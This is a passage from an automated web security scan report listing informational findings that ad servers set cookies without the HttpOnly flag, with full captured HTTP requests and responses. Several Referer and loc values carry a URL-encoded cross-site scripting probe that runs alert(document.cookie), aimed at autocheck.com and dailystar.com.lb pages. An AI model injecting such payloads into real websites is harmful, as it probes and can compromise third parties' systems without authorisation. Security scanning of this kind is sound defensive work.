!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#f93!!!!#<gj@R!#fBu!!!!#<gj@R!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#l)E!!!!#<iC/U!#mOI!!!!#<k0fB"; path=/; expires=Wed, 23-Jan-2013 21:07:10 GMT
Cache-Control: no-store
Last-Modified: Mon, 24 Jan 2011 21:07:10 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.193. http://ad.yieldmanager.com/unpixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • bh="b!!!#J!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!$<k3BW!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!#<k3BW!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4<u!!!!#<k3BW!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!Mr(!!ErC<k0fB!!`Yp!!!!#<htUb!!iEb!!!!#<k3BW!!iF_~~!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#(mB!!!!#<k11E!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#3pw!!!!#<k11E!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!$<k3BW!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!$<k3BW!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!#<k3BW!#fBk!!!!#<k3BW!#fBm!!!!#<k3BW!#fBn!!!!#<k3BW!#fBu!!!!#<gj@R!#fG+!!!!#<k3BW!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#h.N!!!!#<k11E!#l)E!!!!#<iC/U!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!#<k11E"; path=/; expires=Thu, 24-Jan-2013 02:19:11 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?id=494248&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; ih="b!!!!0!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!.N)i!!!!#<htgq!.`.U!!!!#<jHA_!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; pv1="b!!!!%!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~"; bh="b!!!#I!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!$<k3BW!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!#<k3BW!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4<u!!!!#<k3BW!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!Mr(!!ErC<k0fB!!`Yp!!!!#<htUb!!iEb!!!!#<k3BW!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#(mB!!!!#<k11E!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#3pw!!!!#<k11E!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!$<k3BW!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!$<k3BW!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=
J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!#<k3BW!#fBk!!!!#<k3BW!#fBm!!!!#<k3BW!#fBn!!!!#<k3BW!#fBu!!!!#<gj@R!#fG+!!!!#<k3BW!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#h.N!!!!#<k11E!#l)E!!!!#<iC/U!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!#<k11E"

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#J!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!$<k3BW!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!#<k3BW!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4<u!!!!#<k3BW!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!Mr(!!ErC<k0fB!!`Yp!!!!#<htUb!!iEb!!!!#<k3BW!!iF_~~!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#(mB!!!!#<k11E!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#3pw!!!!#<k11E!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!$<k3BW!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!$<k3BW!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!#<k3BW!#fBk!!!!#<k3BW!#fBm!!!!#<k3BW!#fBn!!!!#<k3BW!#fBu!!!!#<gj@R!#fG+!!!!#<k3BW!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#h.N!!!!#<k11E!#l)E!!!!#<iC/U!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!#<k11E"; path=/; expires=Thu, 24-Jan-2013 02:19:11 GMT
Cache-Control: no-store
Last-Modified: Tue, 25 Jan 2011 02:19:11 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.194. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
  • vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=49,123 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z1fSUUpKzMtLLcoEK1CqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d3db691@www.hotelsbycity.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:07:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
Set-Cookie: vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.195. http://ads.dailystar.com.lb/www/delivery/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dailystar.com.lb
Path:   /www/delivery/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:11 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/afr.php?zoneid=45&cb=456 HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:11 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1304

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.196. http://ads.dailystar.com.lb/www/delivery/ck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dailystar.com.lb
Path:   /www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 22:29:37 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php HTTP/1.1
Host: ads.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: OAID=69cbb92020bcada4c658c1886472c417;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:29:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 22:29:37 GMT; path=/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


14.197. http://ads.dailystar.com.lb/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dailystar.com.lb
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:41 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=409&campaignid=194&zoneid=45&loc=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&cb=cb57b3cbbe HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://ads.dailystar.com.lb/www/delivery/afr.php?zoneid=45&cb=456
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=69cbb92020bcada4c658c1886472c417

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:41 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.198. http://ads.doclix.com/adserver/CntImprImg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/CntImprImg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
  • weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
  • monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/CntImprImg?type=msg&p=MTUtMTUwLTE0Ni0xMTEtOTgtOTAtMjUwLTE2NC0yMi00OC01Ny0xMjAtMjM1LTY0LTE5LTI0NC05Ny0xMDAtMTY4LTE5My00OC0xNTgtMjUwLTE1Mi0zNS0yMjctMjAyLTI0Ny00NC0xNjEtMTQxLTE5My0yMS0zNC0yMjgtMjEtMjktMTAzLTE2MC0xNDUtNDktMTY0LTU1LTM1LTM2LTY2LTI0NC0xODMtMTMwLTMtMTAwLTE0MC0zNC0yMTItMTQ3LTE4MC0xOTItNDUtMTAwLTIwMC0xNy0xNzItMjUxLTY3LTIxOC0xNjktMTY5LTE5NC0xODEtOTktMzktNjYtMTQ0LTgtMjQtMTQtMTgyLTgxLTEzLTI2&purl=http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html&r=1998 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Set-Cookie: daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
Set-Cookie: weekly_freq_cap=WzUtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
Set-Cookie: monthly_freq_cap=WzEtMjAxMXwzNDE0fDFd; Domain=.doclix.com; Expires=Tue, 24-Jan-2012 14:54:42 GMT; Path=/
ETag: W/"137-1288970405000"
Last-Modified: Fri, 05 Nov 2010 15:20:05 GMT
Content-Type: image/png
Vary: Accept-Encoding
Connection: close
Content-Length: 137

.PNG
.
...IHDR.............(.4.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE......U..~....tRNS.@..f....IDATx.b`..0.....OmY.....IEND.B`.

14.199. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
  • PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
  • PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
  • PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
  • PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
  • PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
  • PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
  • PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

